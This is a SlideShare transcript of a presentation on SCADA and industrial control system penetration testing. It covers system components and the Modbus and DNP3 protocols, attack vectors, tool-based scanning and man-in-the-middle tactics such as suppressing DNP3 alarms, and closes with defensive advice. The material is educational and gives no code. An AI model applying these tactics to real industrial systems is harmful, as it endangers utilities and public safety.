SlideShare a Scribd company logo

Scada Industrial Control Systems Penetration Testing

Download as PPTX, PDF
Yehia Mamdouh
Yehia Mamdouh

Scada Industrial Control Systems Penetration Testing Start from Types of Scada Networks, then Penetration testing, finally what Security should be follow

Education
1 of 40
PENETRATION TESTING A SCADA INDUSTRIAL CONTROL SYSTEMS By : Yehia Mamdouh
THIS PRESENTATION WILL LET US KNOW: What is SCADA? What is used For? What the benefits behind using SCADA? SCADA system concept How SCADA Communication Works? SCADA Protocols SCADA Cyber security Types of SCADA Networks Attack Vectors Penetration testing methodology Conclusion
WHAT IS SCADA CONTROL SYSTEM? * SCADA : Supervisory Control and Data Acquisition. A type of control system can be used to monitor many different kinds of equipment in many different kinds of environments * In General Refers to an industrial control system (ICS)
WHERE YOU CAN LOCATE SCADA? * Electric power generation, transmission, and distribution * Water and sewage * Buildings, facilities, and environments * Manufacturing * Mass transit * Traffic signals.
BENEFITS OF SCADA Used For 1-Trasmits individual device status 2- Manages energy consumption by controlling the devices 3- Allowing directly control power system equipment 4- Control chemical plant processes, oil and gas pipelines, electrical generation and transmission equipment, manufacturing facilities...etc. EX: Motors, valves, pumps, relayes, etc. Benefits: 1- Identify and solve problems before they even start. 2- Keep your eye on long-term trends and threats 3- Identify and attack bottlenecks and inefficiencies throughout the enterprise 4- Effectively manage bigger and more complicated processes with a smaller staff.
SCADA SYSTEM CONCEPT SCADA WorkStation : Human operator it’s a device to issue a command central SCADA console, receiving raw data in human form, also monitor and control HMI: (Human-Machine Interface) It’s Software & Hardware that allows human operator to monitor state of process under control, modify control settings, manually override auto-control operations The interface locate between the human operator and the commands relevant to the SCADA system. (Windows, Linux or Unix)
SCADA SYSTEM CONCEPT Data Historian: Collect and store information from your mission critical systems, extract and perform accurate analyses (SQL) SCADA Server MTU: (Master terminal unit) is a device that issues the commands to the Remote Terminal Unit (RTUs) which are located at remote places from the control, gathers the required data, stores the information, and process the information and display the information RTU: Connecting to sensors on the process, converting sensors signals and sending digital data to the supervisory systems PLC: Programmable Logic Controller (PLC) automatically performers the main site control process which controls the operation of industrial equipment's. such as control of machinery
WHO SCADA COMMUNICATIONS WORKS? * The Control Operator or workstation monitor the data and initiates control commands to HMI * HMI which is machines, traditional applications installed on workstations running Windows or Linux and recently use web applications These HMIs speak to the SCADA controlling server *SCADA controlling server collected data from Data historian which is basically a database that the SCADA server pushes data to and in some cases pulls data from * SCADA server sends the appropriate signal to the correct RTU or PLC. * The RTU or PLC consults its pre-programmed logic to determine what it should do with this control signal controls the operation of industrial equipment's *Equipment's EX: Relays, Capacitor banks, Feeder Switches, Actuators
Temperature Level Pressure Level Oil Level Alarm Radioactivity level HMI (Web Interface) Work Station Data Historian SCADA Server Communication Router Wide Area Network RTU/PLC RTU/PLC ModBus TCP/IP– DNP3 protocols communicate between SCADA server and RTU/PLC System Concept of SCADA
SCADA PROTOCOL * We have mention that SCADA server send signals to RTU or PLC and vice versa How Can Central SCADA console to receive information from sensors, which are very simple devices? Here is comes SCADA Protocols ! * RTU collects data from sensors and converts the readings into a protocol, such as MODBUS or DNP3, that can be transported across your communications network and back to you DNP3(Distributed Network Protocol) used for communications between master station and RTUs Port 20000 TCP/UDP Modbus is typically used for Supervisory Control and Data Acquisition (SCADA)-style network communication between devices implementations over serial, TCP/IP Standard port 502 TCP DNP3 ModBus
WHY SECURITY IS IMPORTANT IN CONTROL SYSTEMS? Why? *The ability of cyber intruders to gain access to networked control systems might be easy *More efficient methods of communication = more new risks cause disaster *Control systems share the common vulnerabilities with the traditional information technology *Control systems Recently adopting web technology , Which is interesting target for cyber attacks *Non secure protocols that transmitted data some of them = TCP/IP *Control systems turn on to use Windows , Linux which have known vulnerabilities
WHY SECURITY IS IMPORTANT IN CONTROL SYSTEMS? * New protocols and communication standards that are providing increased are the same technologies that have been exploited and compromised in the Internet and networking domains Modbus TCP Modbus request packet No authentication no encryption no security Attacks on Field Devices Database Attacks Communications hijacking and ‘Man-in-the-middle’ attacks Vulnerabilities in Common Protocols
REAL ATTACKS For last years, security risks have been reported in control systems
Types of SCADA Networks
TYPES OF SCADA NETWORKS Early or Monolithic SCADA systems *First SCADA systems held all operations in one *Usually a mainframe, computer. There was little control exercised, and most early SCADA functions were limited to monitoring sensors and flagging any operations *Limited to a single plant or facility. Like the software, SCADA hardware from one vendor was rarely usable in another vendor's SCADA system.
TYPES OF SCADA NETWORKS Distributed SCADA Systems *Shared control functions across multiple smaller (usually PC) computers connected by Local Area Networks (LAN) *Shared Real Time information and often performed small control tasks in addition to alerting operators of possible problems
TYPES OF SCADA NETWORKS Networked SCADA systems * Current SCADA systems are usually networked * Communicate through Wide Area Networks (WAN) systems, over phone or data lines and often transmit data between nodes through Ethernet or Fiber Optic connections. * Make heavy use of Programmable Logic Controllers (PLC) to monitor and make routine process adjustments, *The hardware tends to be more interchangeable as PLC and other sub-unit vendors have standardized communications and other protocols to allow the user to choose the best component for their needs
TYPES OF SCADA NETWORKS Internet of Things (IoT) *A data model allows to define the types of data that will be monitored, allows for new types to be added quickly and easily as new smart objects are added to the process *Allows combinations of smart things/objects, sensor network technologies * Communication will bring physical business benefits like high-resolution management of resources and products, better collaboration between enterprises, and improved life-cycle management
ATTACK VECTORS *SCADA systems are vulnerable to the same threats as any TCP/IP-based system. *SCADA Administrators and Industrial Systems Analysts deceived into thinking that since their industrial networks are on separate systems ,they are safe form outside attacks. *PLCs and RTUs are usually polled by other 3rd party vendor-specific networks and protocols MODBUS4, and DNP, and are usually done over phone lines, leased private frame relay circuits, satellite systems *Security in an industrial network can be compromised in many places along the system and is most easily compromised at the SCADA host or control room level SCADA Attacks How Far?
ATTACK VECTORS *Denial of Service (DoS) attack to crash the SCADA server leading to shut down condition *Delete system files on the SCADA server (System Downtime and Loss of Operations) *Plant a Trojan and take complete control of system *Log any company-sensitive operational data for personal or competition usage There is Attack Vectors Should be addressed 1- Backdoors and holes in network perimeter 2- Vulnerabilities in common protocols 3- Attacks on Field Devices 4- Database Attacks 5- Communications hijacking and ‘Man-in-the-middle’ attacks ++ Once the corporate network compromised, then any IP-based device or computer system can be accessed. ++ 24/7 provides an opportunity to attack the SCADA host system can cause :
ATTACK VECTORS 1-Modern networks in the control system arena, often have inherent capabilities that are deployed without sufficient security analysis and can provide access to attackers once they are discovered. 2- Network components, have technologies These technologies often include firewalls, public-facing services, and wireless access. each of these components often does have associated security vulnerabilities 3-Remotely located control system elements that can be accessed via remotely connected communications if systems are based on commercial operating systems, the attacks can be via DDOS, escalated privilege exploits, Trojan horse Backdoors and holes in network perimeter
ATTACK VECTORS 4- Organizations in many CI/KR sectors provide data to customers, providers, through publicly accessible services. Such as calculating load expectations, billing futures information. As these services are in the public domain, they are often accessible from the Internet with little or no user access limitations 5- Relationship between the firewall and the web server if not deployed right this allows unauthorized, data to flow from the external side to the internal domain. If the attacker compromised the trusted web server, the attacker has a channel to access internal services (or control systems) LAN. Backdoors and holes in network perimeter
ATTACK VECTORS 1- Microsoft XP, a platform commonly used in control systems, mitigates the security issues 2- Control systems and modern networking technologies comes some inherited security vulnerabilities. Even though many of these vulnerabilities have solutions and available workarounds, the deployment of these mitigations in control systems architectures is not always feasible. Attacks Using Common Protocols
ATTACK VECTORS 1-Control systems architectures usually have a capability for remote access to terminal end points and devices in number of ways including by telephonic or dedicated means. To provide for the collection of operational and maintenance data 2-Modern equipment has embedded file servers and web servers to facilitate robust communications these devices are part of an internal and trusted domain, and thus access into these devices can provide an attacker with an unauthorized vector into the control system architecture. 3-RTUs, are an extension of the control domain, attackers can add these field devices to their list of viable targets to be investigated during reconnaissance and scanning phases of the attack. 3-If a device is compromised, and the attacker can leverage control over the device and escalate privileges Attack into control system via field devices
ATTACK VECTORS 1-Database applications have become core application components of control systems and their associated record keeping utilities 2-Databases used by control systems are often connected to databases located on the business network and most use (SQL). The information contained in databases makes them high-value targets for any attacker 3-Attackers can exploit the communications channel between the two networks and bypass the security mechanisms used to protect the control system environment 4-The effect of corrupted database content can impact data acquisition servers, historians, and even the operator HMI console. Control systems databases because they are so reliant on data accuracy and integrity. Database and SQL data injection attacks
ATTACK VECTORS 1- The ability for an attacker to re-route data that is in transit on a network, the ability to capture and analyze critical traffic that is in plaintext format, and the ability toreverse engineer any unique protocols to gain command over control communications 2- By combining all of these MITM, attack is executed 3- As the attack is on the control domain, this plaintext traffic can be harvested (sniffed) and taken offline for analysis and review 4-Using ARP poisoning and collecting traffic, the attacker can establish and maintain complete control over the communications in the network , preventing the HMI from issuing alarms 5- MTM can be between HMI and RTU due to week protocol that are used like Modbus Man-in-the-middle attacks
Penetration Testing Methodology
PENETRATION TESTING METHODOLOGY Penetration Testing Methodology we use in Control systems it like Normal Network Penetration Testing  How? * We are dealing With Devices - Operating systems (windows , Linux ) – Protocols over TCP –Application and SQL Databases – Firewalls Audit identification Devices and networks: Router configs, router tables, switch tables, physical cable checks, packet sniffing Services Local Port verification (nestate) Vulnerabilities Local banner grabbing Perimeter Identify all external connections *Review firewall rules *Review remote access methods *Check for wireless networks *Check physical access
PENETRATION TESTING METHODOLOGY Penetration Testing Methodology we use in Control systems it like Normal Network Penetration Testing  How? Network Infrastructure Review router configs Review switch tables Conduct physical cable checks Conduct packet sniffing and analysis Host operating systems Review patch level Review password quality Review share and directory permissions Review remote access Applications Review ports and services Review OS credentials Revives remote access Consider code review PLCs, RTU,s ..etc. Review patch levels Review password quality Conduct packet sniffing
PENETRATION TESTING METHODOLOGY Scanning / Discovery Some tools are Available Like plcscan - Scans Modbus device Modescan - Scans Modbus devices Nmap ( Be carful single Nmap scan can crush system) Metasploit Modules for Modbus detection *Most PLCs (Communication Modules) have no ability to filter based on source IP address So we Can Use python scripts or John the Ripper for crack Bruteforce PLC online Scan supported devices and stations change name of stations change IP, Netmask, gateway request full network info
PENETRATION TESTING METHODOLOGY Analyze protocols How protocols live in the network? Not blocked by firewalls/switches Accessible between Lan segments Works form data link layer to application layer Easy to detect Easy to analyze So we Can Available Tools detect devices and their protocols monitor state, commands inject, modify reply packets in real times Sniffing Traffic Wireshark tcpdump python hex viewer
PENETRATION TESTING METHODOLOGY Analyze protocols Modbus Using the web is the often the easiest way 80% of Modbus/TCP devices have web interfaces Other research shows most devices run Windows 2k DNP3 *Has source and destination addresses that can be useful in Man-in the-Middle attacks Such as 1-Turn off unsolicited reporting to stifle alarms 2- Issue unauthorized stops, restart, or other functions that could disrupt specific operations *Implementations typically do not employ encryption, authentication and authorization; DNP3 devices simply assume that all messages are valid
PENETRATION TESTING METHODOLOGY Analyze protocols DNP3 Passive Network Reconnaissance With appropriate access captures and analyzes DNP3 messages. This provides the information about network topology, device functionality, Rogue Test Installs a “man-in-the-middle” device between the master and outstations that can read, modify and fabricate DNP3 messages and/or network traffic memory addresses and other data Other attacks on Data Link and Application Layer
PENETRATION TESTING METHODOLOGY Data Manipulation Available Tools Web Application Test and SQL Injection *As Scada Use Web application On HMI and SQL in Database we can test them for possible Vulnerabilities Modlib - Scapy extention [python] OpenDNP3 - Library [C++] Metasploit Modules
Conclusion
SCADA SECURITY Creating Demilitarized Zones (DMZs) Multiple DMZs could also be created for separate functionalities and access privileges, such as peer connections, the data historian, the Inter Control Center Communications Protocol (ICCP) server in SCADA systems Firewalls properly configured and coordinated, can protect passwords, IP addresses, files and more Proxy Servers Proxy server is an internet server that acts as a firewall, mediating traffic between a protected network and the internet The Security Policy Effective security policies and procedures are the first step to a secure control systems network. Many of the same policies Security Training Provide The staff that work in the facility Security Tanning very essential for preventing Physical and Social Engineering Attacks
SCADA SECURITY 1- Identify all connections to SCADA networks 2- Disconnect unnecessary connections to the SCADA network 3- Removing or Disable unnecessary services 4- Implement internal and external IDS and establish 24-hour incident monitoring 5- Conduct Physical security surveys and assess all remote sites connected to the SCADA network to evaluate their security 6- Clearly define cyber security roles, responsibilities and authorities for managers, system administrators and users 7- Document network architecture and identify systems that serve critical function that require additional levels of protection
Scada Industrial Control Systems Penetration Testing

Recommended

BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101Wavestone
 
Cybersecurity in Industrial Control Systems (ICS)
Cybersecurity in Industrial Control Systems (ICS)Cybersecurity in Industrial Control Systems (ICS)
Cybersecurity in Industrial Control Systems (ICS)Joan Figueras Tugas
 
Introducing scada
Introducing scadaIntroducing scada
Introducing scadasommerville-videos
 
SCADA Security Presentation
SCADA Security PresentationSCADA Security Presentation
SCADA Security PresentationFilip Maertens
 
Pasta Threat Modeling
Pasta Threat ModelingPasta Threat Modeling
Pasta Threat ModelingEC-Council
 
SOC Cyber Security
SOC Cyber SecuritySOC Cyber Security
SOC Cyber SecuritySteppa Cyber Security
 
IBM QRadar BB & Rules
IBM QRadar BB & RulesIBM QRadar BB & Rules
IBM QRadar BB & RulesMuhammad Abdel Aal
 
Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...
Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...
Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...Sirius
 

Recommended

BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101BruCON 2015 - Pentesting ICS 101
BruCON 2015 - Pentesting ICS 101Wavestone
 
Cybersecurity in Industrial Control Systems (ICS)
Cybersecurity in Industrial Control Systems (ICS)Cybersecurity in Industrial Control Systems (ICS)
Cybersecurity in Industrial Control Systems (ICS)Joan Figueras Tugas
 
Introducing scada
Introducing scadaIntroducing scada
Introducing scadasommerville-videos
 
SCADA Security Presentation
SCADA Security PresentationSCADA Security Presentation
SCADA Security PresentationFilip Maertens
 
Pasta Threat Modeling
Pasta Threat ModelingPasta Threat Modeling
Pasta Threat ModelingEC-Council
 
SOC Cyber Security
SOC Cyber SecuritySOC Cyber Security
SOC Cyber SecuritySteppa Cyber Security
 
IBM QRadar BB & Rules
IBM QRadar BB & RulesIBM QRadar BB & Rules
IBM QRadar BB & RulesMuhammad Abdel Aal
 
Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...
Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...
Security Incident and Event Management (SIEM) - Managed and Hosted Solutions ...Sirius
 
Physical-Penetration-Presentation-Tina-Ellis.pptx
Physical-Penetration-Presentation-Tina-Ellis.pptxPhysical-Penetration-Presentation-Tina-Ellis.pptx
Physical-Penetration-Presentation-Tina-Ellis.pptxdata68
 
ICS security
ICS securityICS security
ICS securityAhmed Shitta
 
Firewall
FirewallFirewall
Firewallsyeda zoya mehdi
 
Introduction to ICS/SCADA security
Introduction to ICS/SCADA securityIntroduction to ICS/SCADA security
Introduction to ICS/SCADA securityCysinfo Cyber Security Community
 
Telecom Security
Telecom SecurityTelecom Security
Telecom SecurityPriyanka Aash
 
Securing Industrial Control System
Securing Industrial Control SystemSecuring Industrial Control System
Securing Industrial Control SystemHemanth M
 
Nozomi Networks Q1_2018 Company Introduction
Nozomi Networks Q1_2018 Company IntroductionNozomi Networks Q1_2018 Company Introduction
Nozomi Networks Q1_2018 Company IntroductionNozomi Networks
 
Security of IOT,OT And IT.pptx
Security of IOT,OT And IT.pptxSecurity of IOT,OT And IT.pptx
Security of IOT,OT And IT.pptxMohanPandey31
 
ASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersNetProtocol Xpert
 
Scada system ( Overview )
Scada system ( Overview )Scada system ( Overview )
Scada system ( Overview )Ali Al Sarraf
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Software Security
Software SecuritySoftware Security
Software SecurityIntegral university, India
 
RA TechED 2019 - SS16 - Security Where and Why do I start
RA TechED 2019 - SS16 - Security Where and Why do I startRA TechED 2019 - SS16 - Security Where and Why do I start
RA TechED 2019 - SS16 - Security Where and Why do I startRockwell Automation
 
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020Jiunn-Jer Sun
 
BSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseBSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseChris Sistrunk
 
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?Insight
 
Active Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldActive Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldDigital Bond
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGEr Vivek Rana
 
Palo Alto Networks CASB
Palo Alto Networks CASBPalo Alto Networks CASB
Palo Alto Networks CASBAlberto Rivai
 
Data Center Security
Data Center SecurityData Center Security
Data Center SecurityCisco Canada
 
Training manual on scada
Training manual on scadaTraining manual on scada
Training manual on scadabhavuksharma10
 
SCADA Assignment.pptx
SCADA Assignment.pptxSCADA Assignment.pptx
SCADA Assignment.pptxssuser1831ba
 

More Related Content

What's hot

Physical-Penetration-Presentation-Tina-Ellis.pptx
Physical-Penetration-Presentation-Tina-Ellis.pptxPhysical-Penetration-Presentation-Tina-Ellis.pptx
Physical-Penetration-Presentation-Tina-Ellis.pptxdata68
 
Securing Industrial Control System
Securing Industrial Control SystemSecuring Industrial Control System
Securing Industrial Control SystemHemanth M
 
Nozomi Networks Q1_2018 Company Introduction
Nozomi Networks Q1_2018 Company IntroductionNozomi Networks Q1_2018 Company Introduction
Nozomi Networks Q1_2018 Company IntroductionNozomi Networks
 
Security of IOT,OT And IT.pptx
Security of IOT,OT And IT.pptxSecurity of IOT,OT And IT.pptx
Security of IOT,OT And IT.pptxMohanPandey31
 
ASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersNetProtocol Xpert
 
Scada system ( Overview )
Scada system ( Overview )Scada system ( Overview )
Scada system ( Overview )Ali Al Sarraf
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
RA TechED 2019 - SS16 - Security Where and Why do I start
RA TechED 2019 - SS16 - Security Where and Why do I startRA TechED 2019 - SS16 - Security Where and Why do I start
RA TechED 2019 - SS16 - Security Where and Why do I startRockwell Automation
 
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020Jiunn-Jer Sun
 
BSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseBSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseChris Sistrunk
 
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?Insight
 
Active Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldActive Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldDigital Bond
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGEr Vivek Rana
 
Palo Alto Networks CASB
Palo Alto Networks CASBPalo Alto Networks CASB
Palo Alto Networks CASBAlberto Rivai
 
Data Center Security
Data Center SecurityData Center Security
Data Center SecurityCisco Canada
 

What's hot (20)

Physical-Penetration-Presentation-Tina-Ellis.pptx
Physical-Penetration-Presentation-Tina-Ellis.pptxPhysical-Penetration-Presentation-Tina-Ellis.pptx
Physical-Penetration-Presentation-Tina-Ellis.pptx
 
ICS security
ICS securityICS security
ICS security
 
Firewall
FirewallFirewall
Firewall
 
Introduction to ICS/SCADA security
Introduction to ICS/SCADA securityIntroduction to ICS/SCADA security
Introduction to ICS/SCADA security
 
Telecom Security
Telecom SecurityTelecom Security
Telecom Security
 
Securing Industrial Control System
Securing Industrial Control SystemSecuring Industrial Control System
Securing Industrial Control System
 
Nozomi Networks Q1_2018 Company Introduction
Nozomi Networks Q1_2018 Company IntroductionNozomi Networks Q1_2018 Company Introduction
Nozomi Networks Q1_2018 Company Introduction
 
Security of IOT,OT And IT.pptx
Security of IOT,OT And IT.pptxSecurity of IOT,OT And IT.pptx
Security of IOT,OT And IT.pptx
 
ASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & AnswersASA Firewall Interview- Questions & Answers
ASA Firewall Interview- Questions & Answers
 
Scada system ( Overview )
Scada system ( Overview )Scada system ( Overview )
Scada system ( Overview )
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Software Security
Software SecuritySoftware Security
Software Security
 
RA TechED 2019 - SS16 - Security Where and Why do I start
RA TechED 2019 - SS16 - Security Where and Why do I startRA TechED 2019 - SS16 - Security Where and Why do I start
RA TechED 2019 - SS16 - Security Where and Why do I start
 
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
A Big Picture of IEC 62443 - Cybersecurity Webinar (2) 2020
 
BSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA DefenseBSidesAugusta ICS SCADA Defense
BSidesAugusta ICS SCADA Defense
 
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
Meraki vs. Viptela: Which Cisco SD-WAN Solution Is Right for You?
 
Active Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The FieldActive Directory in ICS: Lessons Learned From The Field
Active Directory in ICS: Lessons Learned From The Field
 
NETWORK PENETRATION TESTING
NETWORK PENETRATION TESTINGNETWORK PENETRATION TESTING
NETWORK PENETRATION TESTING
 
Palo Alto Networks CASB
Palo Alto Networks CASBPalo Alto Networks CASB
Palo Alto Networks CASB
 
Data Center Security
Data Center SecurityData Center Security
Data Center Security
 

Similar to Scada Industrial Control Systems Penetration Testing

Training manual on scada
Training manual on scadaTraining manual on scada
Training manual on scadabhavuksharma10
 
SCADA Assignment.pptx
SCADA Assignment.pptxSCADA Assignment.pptx
SCADA Assignment.pptxssuser1831ba
 
Scada system architecture, types and applications
Scada system architecture, types and applicationsScada system architecture, types and applications
Scada system architecture, types and applicationsUchi Pou
 
SCADA.pptx supervisory control and data aquasition
SCADA.pptx supervisory control and data aquasitionSCADA.pptx supervisory control and data aquasition
SCADA.pptx supervisory control and data aquasitionRapidAcademy
 
SCADA Systems and its security!
SCADA Systems and its security!SCADA Systems and its security!
SCADA Systems and its security!Shiv Sahni
 
A presentation on scada system
A presentation on scada systemA presentation on scada system
A presentation on scada systemIIT INDORE
 
Scada systems basics winnie mbau
Scada systems basics winnie mbauScada systems basics winnie mbau
Scada systems basics winnie mbauwinnie15
 
Introduction to SCADA
Introduction to SCADAIntroduction to SCADA
Introduction to SCADAPraveen Kumar
 
SCADA (Supervisory Control & data Acquisation) PPT
SCADA (Supervisory Control & data Acquisation) PPTSCADA (Supervisory Control & data Acquisation) PPT
SCADA (Supervisory Control & data Acquisation) PPTDeepeshK4
 
Scada presentation (group 10)
Scada presentation (group 10)Scada presentation (group 10)
Scada presentation (group 10)Ritvik Bhatia
 
scada-130512133852-phpapp01.pptx
scada-130512133852-phpapp01.pptxscada-130512133852-phpapp01.pptx
scada-130512133852-phpapp01.pptxsurangagw
 
SCADAPresentation.pptx information about scada
SCADAPresentation.pptx information about scadaSCADAPresentation.pptx information about scada
SCADAPresentation.pptx information about scadadarshanbs18
 
Ls catalog thiet bi tu dong master rtu e_dienhathe.vn
Ls catalog thiet bi tu dong master rtu e_dienhathe.vnLs catalog thiet bi tu dong master rtu e_dienhathe.vn
Ls catalog thiet bi tu dong master rtu e_dienhathe.vnDien Ha The
 

Similar to Scada Industrial Control Systems Penetration Testing (20)

Training manual on scada
Training manual on scadaTraining manual on scada
Training manual on scada
 
SCADA Assignment.pptx
SCADA Assignment.pptxSCADA Assignment.pptx
SCADA Assignment.pptx
 
Scada system architecture, types and applications
Scada system architecture, types and applicationsScada system architecture, types and applications
Scada system architecture, types and applications
 
SCADA.pptx supervisory control and data aquasition
SCADA.pptx supervisory control and data aquasitionSCADA.pptx supervisory control and data aquasition
SCADA.pptx supervisory control and data aquasition
 
SCADA Systems and its security!
SCADA Systems and its security!SCADA Systems and its security!
SCADA Systems and its security!
 
A presentation on scada system
A presentation on scada systemA presentation on scada system
A presentation on scada system
 
Scada slide
Scada slideScada slide
Scada slide
 
Scada systems basics winnie mbau
Scada systems basics winnie mbauScada systems basics winnie mbau
Scada systems basics winnie mbau
 
Introduction to SCADA
Introduction to SCADAIntroduction to SCADA
Introduction to SCADA
 
SCADA (Supervisory Control & data Acquisation) PPT
SCADA (Supervisory Control & data Acquisation) PPTSCADA (Supervisory Control & data Acquisation) PPT
SCADA (Supervisory Control & data Acquisation) PPT
 
All about scada
All about scadaAll about scada
All about scada
 
Scada
ScadaScada
Scada
 
Fps scada
Fps scadaFps scada
Fps scada
 
CyberSecurity Best Practices for the IIoT
CyberSecurity Best Practices for the IIoTCyberSecurity Best Practices for the IIoT
CyberSecurity Best Practices for the IIoT
 
Scada presentation (group 10)
Scada presentation (group 10)Scada presentation (group 10)
Scada presentation (group 10)
 
scada-130512133852-phpapp01.pptx
scada-130512133852-phpapp01.pptxscada-130512133852-phpapp01.pptx
scada-130512133852-phpapp01.pptx
 
Dcs vs scada
Dcs vs scadaDcs vs scada
Dcs vs scada
 
SCADAPresentation.pptx information about scada
SCADAPresentation.pptx information about scadaSCADAPresentation.pptx information about scada
SCADAPresentation.pptx information about scada
 
Scada and industry 4.0
Scada and industry 4.0Scada and industry 4.0
Scada and industry 4.0
 
Ls catalog thiet bi tu dong master rtu e_dienhathe.vn
Ls catalog thiet bi tu dong master rtu e_dienhathe.vnLs catalog thiet bi tu dong master rtu e_dienhathe.vn
Ls catalog thiet bi tu dong master rtu e_dienhathe.vn
 

Recently uploaded

Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)lakshayb543
 
AMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdf
AMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdfAMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdf
AMERICAN LANGUAGE HUB_Level2_Student'sBook_Answerkey.pdfphamnguyenenglishnb
 
How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17How to Add Barcode on PDF Report in Odoo 17
How to Add Barcode on PDF Report in Odoo 17Celine George
 
What is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPWhat is Model Inheritance in Odoo 17 ERP
What is Model Inheritance in Odoo 17 ERPCeline George
 
FILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinoFILIPINO PSYCHology sikolohiyang pilipino
FILIPINO PSYCHology sikolohiyang pilipinojohnmickonozaleda
 
Karra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptxKarra SKD Conference Presentation Revised.pptx
Karra SKD Conference Presentation Revised.pptxAshokKarra1
 
How to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPHow to do quick user assign in kanban in Odoo 17 ERP
How to do quick user assign in kanban in Odoo 17 ERPCeline George
 
Earth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatEarth Day Presentation wow hello nice great
Earth Day Presentation wow hello nice greatYousafMalik24
 
Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Procuring digital preservation CAN be quick and painless with our new dynamic...
Procuring digital preservation CAN be quick and painless with our new dynamic...Jisc
 
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️
call girls in Kamla Market (DELHI) 🔝 >༒9953330565🔝 genuine Escort Service 🔝✔️✔️9953056974 Low Rate Call Girls In Saket, Delhi NCR
 
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...
USPS® Forced Meter Migration - How to Know if Your Postage Meter Will Soon be...Postal Advocate Inc.
 
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
Like-prefer-love -hate+verb+ing & silent letters & citizenship text.pdfLike-prefer-love -hate+verb+ing & silent letters & citizenship text.pdf
